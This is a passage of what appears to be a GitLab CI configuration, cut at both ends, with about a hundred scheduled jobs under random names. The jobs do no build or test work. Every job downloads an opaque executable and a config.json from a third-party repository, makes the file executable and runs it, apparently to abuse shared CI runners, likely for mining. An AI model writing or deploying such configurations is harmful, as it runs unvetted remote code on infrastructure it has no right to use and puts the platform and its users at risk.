    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

l_j:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

jobgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

ffdgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

gwsegd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

hrswegd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

hseggd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

jhedbgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

fherfcgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

asrgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

hehrswegd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

hsjktyggd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

aagd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

abgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

acgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

adgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

aegd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

b_agd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

b_bgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

b_cgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

agdgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

b_egd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

c_agd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

c_bgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

c_cgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

hgerddgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

c_egd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

d_agd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

d_bgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

d_cgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

d_dgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

d_egd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

e_agd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

e_bgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

e_cgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

e_dgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

e_egd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

f_agd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

f_bgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

f_cgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

f_dgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

f_egd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

f_fgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

f_ggd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

f_hgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

f_igd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

f_jgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

g_agd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

g_bgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

g_cgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

g_dgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

g_egd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

h_agd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

h_bgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

h_cgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

h_dgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

h_egd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

h_fgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

h_ggd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

h_hgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

h_igd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

h_jgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

i_agd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

i_bgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

i_cgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

i_dgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

i_egd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

i_fgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

i_ggd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

i_hgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

i_igd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

i_jgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

k_agd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

k_bgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

k_cgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

k_dgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

k_egd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

k_fgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

k_ggd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

k_hgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

k_igd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

k_jgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

l_agd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

l_bgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

l_cgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

l_dgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

l_egd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

l_fgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

l_ggd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
